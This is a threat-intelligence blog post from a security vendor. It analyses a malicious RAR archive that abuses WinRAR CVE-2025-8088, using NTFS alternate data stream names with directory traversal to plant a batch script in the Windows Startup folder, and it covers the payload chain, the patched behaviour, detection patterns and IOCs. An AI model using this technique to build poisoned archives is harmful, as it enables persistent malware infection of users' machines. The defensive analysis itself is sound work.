Meet Foresiet Nexus — Your smarter Threat Intel hub. See it in action — book a free demo today!

Weekly newsletter

No spam. Just the latest releases and tips, interesting articles, and exclusive interviews in your inbox every week.

Read about our privacy policy.

Latest from the blog

Lazarus Group (APT38 / APT-C-26) Exploits WinRAR Vulnerability CVE-2025-8088 for Archive Poisoning Attacks

Posted on: 18 Dec 2025 | Author: Foresiet

During routine threat research and monitoring of Chinese-language underground distribution channels, our team identified a malicious RAR archive. Specifically, this archive abuses a critical WinRAR directory traversal vulnerability to achieve arbitrary file write and persistence on Windows systems.

To accomplish this, the archive leverages a combination of NTFS Alternate Data Streams (ADS) and directory traversal logic. Consequently, it can drop a malicious batch script directly into the Windows Startup directory. When a user extracts the file using a vulnerable WinRAR version (≤ 7.12), the payload is primed for automatic execution. As a result, the malware runs silently on the next user logon. Furthermore, these types of archives are commonly used for the distribution of malware loaders, credential stealers, and initial access tooling.

While we do not claim direct attribution, the techniques observed in this campaign—particularly the abuse of archive parsing logic and multi-stage loaders—overlap with tradecraft previously seen in Lazarus-linked operations and other advanced persistent threat (APT) campaigns. Therefore, this blog documents the archive structure, vulnerability mechanics, and payload behavior, while also providing evidence of the patched behavior in newer WinRAR versions.

Archive Structure Overview

At first glance, the archive appears benign. It contains multiple small text files named sequentially:

Archive Structure Overview

Alongside these decoy files, the archive also contains numerous Python scripts (bot*.py), which are not immediately executed during extraction but are used later in the infection chain.

Key observation:

The malicious behavior does not rely on visible filenames. Instead, it is embedded in NTFS Alternate Data Streams attached to the text files.

NTFS Alternate Data Stream

Abuse of NTFS Alternate Data Streams (ADS)

Using 010 Editor with a RAR structure template, we identified multiple “Service (NTFS streams) block” entries associated with the text files.

One critical block contains the following properties:

  • Name: STM
  • Type: NTFS Alternate Data Stream
  • DataSize: 642 bytes

The STM stream is treated specially by WinRAR during extraction.

Directory Traversal via ADS Payload

Inspection of the ADS data reveals a crafted stream name containing a relative traversal path, rather than a valid ADS identifier:

Directory Traversal via ADS Payload

This violates expected NTFS ADS naming rules, where the portion after : should be a simple stream name—not a filesystem path.

However, WinRAR 7.12 fails to validate this input correctly.

As a result, during extraction:

  1. WinRAR concatenates the base extraction path with the ADS name.
  2. The traversal (..\) escapes the extraction directory.
  3. A file named bat is written directly into the user’s Startup folder.
RAR archive contains an NTFS Alternate Data Stream (ADS) identified by the STM stream name.

Persistence via Startup Folder Write

Runtime monitoring confirms the impact of this flaw.

Using process and filesystem monitoring, we observed WinRAR issuing file creation operations targeting:

Persistence via Startup Folder Write

Any executable or script placed in this directory is automatically executed when the user logs in, providing persistent execution without further user interaction.

This confirms that simply extracting the archive on a vulnerable WinRAR version is sufficient to establish persistence.

Payload Execution & Social Engineering

Upon execution, the dropped 1.bat script displays a fake Windows Defender update warning to the user, instructing them to temporarily disable antivirus protection and restart the system.

This message is implemented using a PowerShell-based message box and serves as a social engineering technique to reduce detection during subsequent payload execution.

(Screenshot: Fake Windows Defender update popup)

The batch script then proceeds to download and execute additional payload components, including a Python-based loader.

This stage represents post-exploitation behavior and is separate from the WinRAR vulnerability itself.

Secondary Payload Overview

The downloaded Python loader performs the following high-level actions:

  • Checks for the presence of a Python runtime
  • Installs Python if missing
  • Writes additional scripts to persistence locations
  • Deploys further malware components (e.g., stealer / injector modules)

The loader employs multi-layer obfuscation, including:

  • String reversal
  • Base64 decoding
  • Zlib decompression

A detailed analysis of these components is outside the scope of this report and may be covered separately.

Patch Behavior and Mitigation Validation

When attempting to extract the same archive using a patched WinRAR version (≥ 7.13), the exploit fails.

WinRAR displays repeated diagnostic errors such as:

The filename, directory name, or volume label syntax is incorrect.

No files are written outside the extraction directory, and no Startup persistence is achieved.

This confirms that WinRAR has introduced additional validation to prevent malformed ADS names from containing path separators, effectively mitigating this attack vector.

Detection and Defensive Recommendations

Immediate Mitigations

  • Update WinRAR to version 7.13 or later
  • Avoid extracting archives from untrusted sources

Detection Opportunities

  • Monitor file creation events in:

·         %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup

  • Alert on archive extraction processes creating files outside the chosen extraction directory
  • Flag NTFS ADS usage combined with traversal patterns (..\)

Appendix IOC

  • MD5: faa9dec02bad43b1af68a4194dea8762 (Pharos.rar)
  • MD5: 273af5e2e0130baee7d3b55081be5ad5 (stub.pyw)
  • MD5: 41df3b66ebcfb6e4d4d581d678299041 (Tsunami-Installer)
  • Mutex: il9MGMxYXWAeXxAm

Conclusion

This case demonstrates how legacy filesystem features, when combined with insufficient input validation, can be abused to create reliable persistence mechanisms using nothing more than a crafted archive file.

By leveraging NTFS Alternate Data Streams and directory traversal, attackers were able to convert a simple archive extraction into a full persistence event—without exploiting memory corruption or requiring elevated privileges.

The issue has since been addressed in newer WinRAR versions, but the technique highlights the ongoing risk posed by complex file format parsers and underscores the importance of keeping widely used utilities up to date.

About us!

Foresiet is the pioneering force in digital security solutions, offering the first integrated Digital Risk Protection SaaS platform. With 24x7x365 dark web monitoring and proactive threat intelligence, Foresiet safeguards against data breaches and intellectual property theft. Our robust suite includes brand protection, takedown services, and supply chain assessment, enhancing your organization’s defense mechanisms. Attack surface management is a key component of our approach, ensuring comprehensive protection across all vulnerable points. Compliance is assured through adherence to ISO27001, NIST, GDPR, PCI, SOX, HIPAA, SAMA, CITC, and Third Party regulations. Additionally, our advanced antiphishing shield provides unparalleled protection against malicious emails. Trust Foresiet to empower your organization to navigate the digital landscape securely and confidently.

Latest

From the blog

The latest industry news, interviews, technologies, and resources.